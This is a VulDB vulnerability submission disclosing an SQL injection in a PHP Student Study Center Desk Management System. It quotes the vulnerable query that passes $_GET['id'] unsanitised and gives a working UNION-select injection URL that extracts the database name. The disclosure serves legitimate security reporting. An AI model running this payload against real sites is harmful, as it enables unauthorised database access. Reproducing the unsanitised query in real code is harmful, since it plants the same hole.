| Titel | Student Study Center Desk Management System exist Sql injection Vulnerability . |
|---|
| Beschreibung | Vulnerability file location:/admin/user/manage_ user.php
look at this source code
```
$user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
```
There is no detection and filtering of $id, and malicious data can be constructed here to attack the website database.
The construction statement is as follows
```
? page=user/manage_ user&id=0' union select 1,database(),3,4,5,6,7,8,9,10,11--+
```
https://s1.ax1x.com/2023/03/15/pp1gd8x.png
Source link
https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code |
|---|
| Quelle | ⚠️ https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code |
|---|
| Benutzer | qidian (UID 30810) |
|---|
| Einreichung | 15.03.2023 05:53 (vor 3 Jahren) |
|---|
| Moderieren | 15.03.2023 07:31 (2 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 223111 [SourceCodester Student Study Center Desk Management System 1.0 manage_user.php ID SQL Injection] |
|---|
| Punkte | 20 |
|---|